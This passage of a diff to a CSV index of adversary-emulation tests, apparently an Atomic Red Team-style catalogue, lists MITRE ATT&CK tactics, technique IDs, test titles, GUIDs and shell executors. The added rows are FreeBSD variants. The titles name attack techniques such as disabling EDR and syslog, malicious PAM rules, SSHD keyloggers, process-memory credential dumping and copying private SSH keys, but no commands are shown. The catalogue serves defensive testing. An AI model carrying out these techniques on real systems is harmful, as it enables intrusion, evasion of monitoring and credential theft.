binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash +defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash +defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh +defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash +defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash +defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh +defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh @@ -91,8 +124,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh +defense-evasion,T1027,Obfuscated Files or Information,2,Decode base64 Data into Script,197ed693-08e6-4958-bfd8-5974e291be6c,sh defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh +defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh @@ -101,27 +136,38 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a si defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash +defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash +defense-evasion,T1036.006,Masquerading: Space after Filename,3,Space After Filename (FreeBSD),cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8,sh defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash +defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash +defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash +defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh +persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh +persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash +persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh @@ -131,20 +177,29 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level t persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh +persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash +persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash +persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash +persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash +persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh +command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh +command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh @@ -162,31 +217,44 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compress collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash +collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash +collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh +collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash +collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh +privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh @@ -197,31 +265,45 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh +privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash +privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash +privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash +privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash +privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh +credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh +credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash +credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash +credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh +credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh +credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash @@ -230,14 +312,20 @@ credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh +credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync 